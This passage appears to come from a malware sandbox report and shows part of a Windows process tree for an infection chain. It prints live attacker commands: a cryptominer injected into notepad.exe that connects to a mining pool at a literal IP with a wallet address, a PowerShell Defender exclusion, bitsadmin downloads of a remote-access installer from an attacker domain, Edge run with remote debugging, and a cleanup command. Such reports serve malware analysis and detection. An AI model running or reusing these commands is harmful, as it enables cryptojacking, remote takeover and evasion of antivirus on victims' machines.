                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
                                                                                                                  8⤵
                                                                                                                    PID:7160
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
                                                                                                                    8⤵
                                                                                                                      PID:6772
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3024 /prefetch:8
                                                                                                                      8⤵
                                                                                                                        PID:5192
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                                                        8⤵
                                                                                                                        • Uses browser remote debugging
                                                                                                                        PID:3800
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                                        8⤵
                                                                                                                        • Uses browser remote debugging
                                                                                                                        PID:6120
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3756 /prefetch:2
                                                                                                                        8⤵
                                                                                                                          PID:3756
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2984 /prefetch:2
                                                                                                                          8⤵
                                                                                                                            PID:5736
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3752 /prefetch:2
                                                                                                                            8⤵
                                                                                                                              PID:1868
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3976 /prefetch:2
                                                                                                                              8⤵
                                                                                                                                PID:1428
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2092 /prefetch:2
                                                                                                                                8⤵
                                                                                                                                  PID:5528
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3852 /prefetch:2
                                                                                                                                  8⤵
                                                                                                                                    PID:2508
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3708 /prefetch:2
                                                                                                                                    8⤵
                                                                                                                                      PID:6300
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,18224581851658185960,8606365814557230904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4668 /prefetch:2
                                                                                                                                      8⤵
                                                                                                                                        PID:6652
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                      7⤵
                                                                                                                                      • Uses browser remote debugging
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                      PID:2032
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffe61b246f8,0x7ffe61b24708,0x7ffe61b24718
                                                                                                                                        8⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:4144
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                                                                                                                        8⤵
                                                                                                                                          PID:1104
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
                                                                                                                                          8⤵
                                                                                                                                            PID:6268
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                                                                                                                                            8⤵
                                                                                                                                              PID:2016
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1
                                                                                                                                              8⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              PID:6956
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                                              8⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              PID:7156
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2752 /prefetch:2
                                                                                                                                              8⤵
                                                                                                                                                PID:6824
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
                                                                                                                                                8⤵
                                                                                                                                                  PID:5744
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2752 /prefetch:2
                                                                                                                                                  8⤵
                                                                                                                                                    PID:1152
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3676 /prefetch:2
                                                                                                                                                    8⤵
                                                                                                                                                      PID:3884
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2540 /prefetch:2
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7024
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4216 /prefetch:2
                                                                                                                                                        8⤵
                                                                                                                                                          PID:4840
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3760 /prefetch:2
                                                                                                                                                          8⤵
                                                                                                                                                            PID:6236
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,8707984827039612166,14419317475831698497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3792 /prefetch:2
                                                                                                                                                            8⤵
                                                                                                                                                              PID:6360
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o8yuk" & exit
                                                                                                                                                            7⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:7256
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /t 11
                                                                                                                                                              8⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:232
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10128520101\2qv26zF.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10128520101\2qv26zF.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:1784
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10130000101\esFK2gm.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10130000101\esFK2gm.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          PID:6672
                                                                                                                                                          • C:\Windows\System32\notepad.exe
                                                                                                                                                            --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6724
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              tasklist /FI "PID eq 6724"
                                                                                                                                                              7⤵
                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                              PID:4436
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              tasklist /FI "PID eq 6724"
                                                                                                                                                              7⤵
                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                              PID:6772
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              tasklist /FI "PID eq 6724"
                                                                                                                                                              7⤵
                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                              PID:6652
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              tasklist /FI "PID eq 6724"
                                                                                                                                                              7⤵
                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                              PID:5900
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              tasklist /FI "PID eq 6724"
                                                                                                                                                              7⤵
                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                              PID:5904
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10130580101\eqvpgUK.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10130580101\eqvpgUK.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Drops startup file
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:5176
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\3UIvN0mq\Anubis.exe""
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4228
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10130690101\YxuHUqf.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10130690101\YxuHUqf.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3004
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10130690101\YxuHUqf.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10130690101\YxuHUqf.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:1088
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 972
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:7132
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10131261121\EDM8nAR.cmd"
                                                                                                                                                            6⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2652
                                                                                                                                                            • C:\Windows\SysWOW64\fltMC.exe
                                                                                                                                                              fltmc
                                                                                                                                                              7⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5588
                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                              bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                                                                                                                                                              7⤵
                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2576
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10131371121\EDM8nAR.cmd"
                                                                                                                                                            6⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3912
                                                                                                                                                            • C:\Windows\SysWOW64\fltMC.exe
                                                                                                                                                              fltmc
                                                                                                                                                              7⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:1548
                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                              bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                                                                                                                                                              7⤵
                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2520
                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                              bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"
                                                                                                                                                              7⤵
                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4016
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10131380101\YxuHUqf.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10131380101\YxuHUqf.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2764
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10131380101\YxuHUqf.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10131380101\YxuHUqf.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2248
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 960
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:708
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10131390101\eqvpgUK.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10131390101\eqvpgUK.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3460
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
